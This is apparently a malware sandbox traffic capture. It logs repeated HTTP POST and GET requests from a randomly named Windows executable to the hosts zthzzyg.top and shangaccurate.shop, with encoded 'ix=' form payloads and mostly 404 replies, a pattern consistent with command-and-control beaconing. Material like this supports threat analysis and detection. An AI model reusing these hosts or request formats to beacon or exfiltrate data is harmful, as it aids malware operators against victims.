                                                                                                            Data Raw: 69 78 3d 48 6d 4a 71 77 59 32 32 6d 2f 73 4f 4b 70 6d 44 58 64 77 73 6a 59 63 70 35 58 53 33 71 4e 52 41 77 6c 30 30 67 34 68 4b 61 74 4e 32 56 62 6d 54 49 63 42 30 33 58 76 55 39 34 4d 4e 75 52 62 79 39 2b 46 64 42 58 44 73 33 58 65 61 65 33 34 66 33 76 63 55 46 5a 2f 33 49 47 71 56 39 35 68 30 37 56 4a 32 50 33 45 36 42 51 52 33 6e 68 6d 56 6f 44 6a 34 33 53 47 46 73 66 76 59 76 4e 36 33 65 38 35 79 68 32 6c 71 4a 61 42 7a 45 77 68 34 71 73 76 62 46 53 48 6f 45 55 4e 48 52 56 74 69 57 32 45 62 4f 6b 49 6b 6c 6d 61 66 73 53 62 72 37 63 4d 48 64 39 37 7a 63 73 37 4b 6c 6e 56 69 65 55 41 53 39 53 65 59 56 6d 4b 46 6b 6a 30 52 6a 67 3d 3d
                                                                                                            Data Ascii: ix=HmJqwY22m/sOKpmDXdwsjYcp5XS3qNRAwl00g4hKatN2VbmTIcB03XvU94MNuRby9+FdBXDs3Xeae34f3vcUFZ/3IGqV95h07VJ2P3E6BQR3nhmVoDj43SGFsfvYvN63e85yh2lqJaBzEwh4qsvbFSHoEUNHRVtiW2EbOkIklmafsSbr7cMHd97zcs7KlnVieUAS9SeYVmKFkj0Rjg==
                                                                                                            Apr 14, 2025 23:19:50.740915060 CEST707INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 14 Apr 2025 21:19:50 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.74970338.181.35.142806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:53.196038961 CEST748OUTPOST /m2co/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.zthzzyg.top
                                                                                                            Content-Length: 235
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zthzzyg.top
                                                                                                            Referer: http://www.zthzzyg.top/m2co/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 48 6d 4a 71 77 59 32 32 6d 2f 73 4f 4c 49 57 44 52 38 77 73 30 6f 63 71 33 33 53 33 6b 74 51 4a 77 6c 77 30 67 39 42 61 61 66 35 32 62 5a 75 54 4c 5a 39 30 77 58 76 55 6c 6f 4d 79 6b 78 62 31 39 2b 42 56 42 57 2f 73 33 58 4b 61 65 7a 6f 66 33 59 49 62 45 4a 2f 31 45 6d 71 58 35 35 68 30 37 56 4a 32 50 33 67 55 42 51 35 33 6e 78 57 56 35 58 50 35 35 79 47 47 72 66 76 59 72 4e 36 7a 65 38 35 55 68 7a 5a 41 4a 66 46 7a 45 78 52 34 71 39 76 55 4b 53 48 71 4b 30 4d 58 57 30 41 72 59 6b 34 6e 42 43 46 39 70 58 4c 2f 6b 45 61 4a 68 2b 41 72 44 73 44 49 59 75 66 38 79 42 49 58 63 56 45 4b 77 77 71 35 4b 52 76 76 70 78 56 56 31 61 32 7a 6b 6b 49 46 44 67 61 4d 5a 54 6f 47 78 74 56 35 47 39 41 3d
                                                                                                            Data Ascii: ix=HmJqwY22m/sOLIWDR8ws0ocq33S3ktQJwlw0g9Baaf52bZuTLZ90wXvUloMykxb19+BVBW/s3XKaezof3YIbEJ/1EmqX55h07VJ2P3gUBQ53nxWV5XP55yGGrfvYrN6ze85UhzZAJfFzExR4q9vUKSHqK0MXW0ArYk4nBCF9pXL/kEaJh+ArDsDIYuf8yBIXcVEKwwq5KRvvpxVV1a2zkkIFDgaMZToGxtV5G9A=
                                                                                                            Apr 14, 2025 23:19:53.578737974 CEST707INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 14 Apr 2025 21:19:53 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.74970438.181.35.142806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:56.034625053 CEST736OUTPOST /m2co/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.zthzzyg.top
                                                                                                            Content-Length: 223
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.zthzzyg.top
                                                                                                            Referer: http://www.zthzzyg.top/m2co/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 48 6d 4a 71 77 59 32 32 6d 2f 73 4f 4c 49 57 44 52 38 77 73 30 6f 63 71 33 33 53 33 6b 74 51 4a 77 6c 77 30 67 39 42 61 61 66 68 32 62 72 57 54 4a 2b 70 30 78 58 76 55 37 34 4d 4a 6b 78 61 70 39 2b 35 52 42 57 79 52 33 58 65 61 65 33 34 66 6d 66 63 62 50 70 2f 31 49 47 72 63 71 70 68 52 37 56 4d 4e 50 33 45 55 42 51 56 33 6e 68 32 56 37 33 50 35 34 43 47 2b 71 66 76 59 6d 74 36 78 65 38 4a 49 68 7a 34 31 4a 5a 42 7a 45 44 5a 34 72 71 37 55 4b 79 48 71 48 55 4d 52 64 55 4d 53 59 6b 68 69 42 44 41 39 71 68 36 66 69 79 4c 33 39 66 6b 58 64 73 44 79 5a 76 76 6b 38 67 49 57 62 31 41 65 39 69 54 64 58 6d 2f 35 74 78 6c 57 31 75 69 37 6e 7a 34 67 4b 6b 48 55
                                                                                                            Data Ascii: ix=HmJqwY22m/sOLIWDR8ws0ocq33S3ktQJwlw0g9Baafh2brWTJ+p0xXvU74MJkxap9+5RBWyR3Xeae34fmfcbPp/1IGrcqphR7VMNP3EUBQV3nh2V73P54CG+qfvYmt6xe8JIhz41JZBzEDZ4rq7UKyHqHUMRdUMSYkhiBDA9qh6fiyL39fkXdsDyZvvk8gIWb1Ae9iTdXm/5txlW1ui7nz4gKkHU
                                                                                                            Apr 14, 2025 23:19:56.410912037 CEST707INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 14 Apr 2025 21:19:56 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.74970538.181.35.142806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:19:58.865468025 CEST467OUTGET /m2co/?NN=3NLhkz&ix=KkhKztOrouYdO6KpXdVqi4w74F2zq51iuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrT7TrEWbDpJgYtRp9N28tSgtD4xDdgHuP4RPfj9LZ7uS6d61btWswAq5C HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Host: www.zthzzyg.top
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Apr 14, 2025 23:19:59.258589983 CEST707INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 14 Apr 2025 21:19:59 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 564
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.749706104.21.85.156806016C:\Program Files (x86)\fsoqlJUJeysbzyyJyNbpZQdinPBGQcaCYpnuGmcdpgHJGJzWshgLGkioyLDEDJiMiESUirP\jy7dhEfPtuBr.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:20:12.751338959 CEST749OUTPOST /3p3g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shangaccurate.shop
                                                                                                            Content-Length: 215
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.shangaccurate.shop
                                                                                                            Referer: http://www.shangaccurate.shop/3p3g/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 76 4f 4a 52 42 74 50 6e 62 73 72 6f 34 49 78 68 65 50 63 2f 75 55 58 4d 53 4d 76 56 48 65 4e 63 46 63 51 62 4a 34 78 37 57 63 6f 38 61 4a 69 62 51 54 32 52 76 34 77 52 58 45 73 53 48 45 71 4b 43 6a 67 6d 78 76 6f 6d 6e 73 33 62 41 34 59 39 74 4a 36 71 37 44 6a 63 46 2b 48 2f 38 46 72 6f 6d 2b 64 52 31 31 69 4d 67 77 6a 71 32 69 2f 41 36 48 4b 47 64 56 74 31 4d 30 48 71 4d 79 2b 78 53 49 6a 38 38 46 57 2f 69 7a 5a 6f 6e 64 36 58 37 59 44 32 77 53 52 70 76 33 49 57 52 62 63 35 39 52 77 6c 7a 54 2b 5a 55 33 69 44 41 54 6b 56 36 33 50 2f 36 4c 36 67 46 54 4f 42 62 61 51 4b 6a 54 43 77 72 6f 5a 49 77 7a 2b 41 55 52 72 77 71 41 3d 3d
                                                                                                            Data Ascii: ix=vOJRBtPnbsro4IxhePc/uUXMSMvVHeNcFcQbJ4x7Wco8aJibQT2Rv4wRXEsSHEqKCjgmxvomns3bA4Y9tJ6q7DjcF+H/8From+dR11iMgwjq2i/A6HKGdVt1M0HqMy+xSIj88FW/izZond6X7YD2wSRpv3IWRbc59RwlzT+ZU3iDATkV63P/6L6gFTOBbaQKjTCwroZIwz+AURrwqA==
                                                                                                            Apr 14, 2025 23:20:13.037368059 CEST979INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:20:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kmuBsHpqsGaomDUH8AbbvyRl0Gk8RV4m3mMm4o4YSK3mHomWWGVnCV%2BICES7RkXuDocZNMu%2BFPILbqwKbewyk59XBqXIUaLP%2Bj2k4eLPSZ2hEstFfLFlTv67jUbFSDw7Df5TTKGSNBf%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 93063ef01d178db5-MIA
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=121700&min_rtt=121700&rtt_var=60850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=749&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                            Apr 14, 2025 23:20:13.037657022 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            15192.168.2.749707104.21.85.15680
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:20:16.379368067 CEST769OUTPOST /3p3g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shangaccurate.shop
                                                                                                            Content-Length: 235
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.shangaccurate.shop
                                                                                                            Referer: http://www.shangaccurate.shop/3p3g/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 76 4f 4a 52 42 74 50 6e 62 73 72 6f 37 6f 42 68 63 6f 77 2f 76 30 58 50 64 73 76 56 49 2b 4e 41 46 63 73 62 4a 36 63 67 57 75 4d 38 61 72 71 62 52 58 69 52 6d 6f 77 52 44 55 73 54 44 45 72 45 43 6a 73 49 78 74 4d 6d 6e 73 6a 62 41 39 38 39 74 36 53 74 37 54 6a 53 4e 65 48 39 7a 6c 72 6f 6d 2b 64 52 31 31 48 6a 67 77 37 71 33 53 50 41 37 6a 6d 46 47 31 74 32 64 30 48 71 66 69 2b 39 53 49 69 5a 38 45 4b 46 69 78 68 6f 6e 5a 2b 58 37 74 75 45 36 53 52 6a 68 58 49 48 5a 61 68 56 38 44 59 49 39 6a 32 43 63 46 4f 53 4d 46 6c 33 67 56 44 54 6b 61 43 62 42 52 71 33 4d 38 4e 2f 68 53 47 6f 6d 4b 74 70 76 45 62 71 5a 44 4b 30 38 37 52 4c 4b 6a 38 78 51 4c 46 76 53 46 33 6f 48 76 43 58 6f 59 51 3d
                                                                                                            Data Ascii: ix=vOJRBtPnbsro7oBhcow/v0XPdsvVI+NAFcsbJ6cgWuM8arqbRXiRmowRDUsTDErECjsIxtMmnsjbA989t6St7TjSNeH9zlrom+dR11Hjgw7q3SPA7jmFG1t2d0Hqfi+9SIiZ8EKFixhonZ+X7tuE6SRjhXIHZahV8DYI9j2CcFOSMFl3gVDTkaCbBRq3M8N/hSGomKtpvEbqZDK087RLKj8xQLFvSF3oHvCXoYQ=
                                                                                                            Apr 14, 2025 23:20:16.665311098 CEST981INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:20:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o3083VJbqSL5iICzzXjxneKFLCjsD81RvG61b76coJgb%2BMN2Zcdp4V4FiqSPfRZ%2FVQR9I%2BTyvfRsH0VwBO9fC7fVl2e6mkJXiNEwhbP7F4ae7OV0WT8DroVw%2BG%2FLzrjbxmSQeBVuxTaO"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 93063f06bde88da3-MIA
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=121868&min_rtt=121868&rtt_var=60934&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                                                                            Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                                                                            Apr 14, 2025 23:20:16.665329933 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            16192.168.2.749708104.21.85.15680
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Apr 14, 2025 23:20:19.037919044 CEST757OUTPOST /3p3g/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.shangaccurate.shop
                                                                                                            Content-Length: 223
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Connection: close
                                                                                                            Origin: http://www.shangaccurate.shop
                                                                                                            Referer: http://www.shangaccurate.shop/3p3g/
                                                                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; SSOEnabled)
                                                                                                            Data Raw: 69 78 3d 76 4f 4a 52 42 74 50 6e 62 73 72 6f 37 6f 42 68 63 6f 77 2f 76 30 58 50 64 73 76 56 49 2b 4e 41 46 63 73 62 4a 36 63 67 57 75 45 38 62 65 6d 62 52 32 69 52 30 34 77 52 66 6b 73 65 44 45 72 4a 43 6a 30 45 78 74 77 51 6e 73 33 62 41 34 59 39 6e 70 36 74 31 7a 6a 53 46 2b 48 35 33 6c 72 65 6d 2b 52 72 31 31 6a 6a 67 77 58 71 32 68 58 41 39 44 6d 46 4f 6c 74 77 62 45 48 71 62 69 2b 37 53 4d 47 4e 38 45 72 36 69 79 68 6f 6e 71 6d 58 70 4f 57 45 34 79 52 6a 69 58 49 4a 41 4b 74 38 38 44 52 62 39 6b 32 41 62 77 43 44 4f 7a 30 4a 38 30 6e 76 36 61 43 68 41 51 61 76 43 64 4e 2b 6d 79 43 38 72 59 55 4e 79 7a 4c 38 64 44 36 33 38 50 46 44 4a 30 4d 55 5a 50 59 33
                                                                                                            Data Ascii: ix=vOJRBtPnbsro7oBhcow/v0XPdsvVI+NAFcsbJ6cgWuE8bembR2iR04wRfkseDErJCj0ExtwQns3bA4Y9np6t1zjSF+H53lrem+Rr11jjgwXq2hXA9DmFOltwbEHqbi+7SMGN8Er6iyhonqmXpOWE4yRjiXIJAKt88DRb9k2AbwCDOz0J80nv6aChAQavCdN+myC8rYUNyzL8dD638PFDJ0MUZPY3
                                                                                                            Apr 14, 2025 23:20:19.338892937 CEST977INHTTP/1.1 404 Not Found
                                                                                                            Date: Mon, 14 Apr 2025 21:20:19 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            cf-cache-status: DYNAMIC
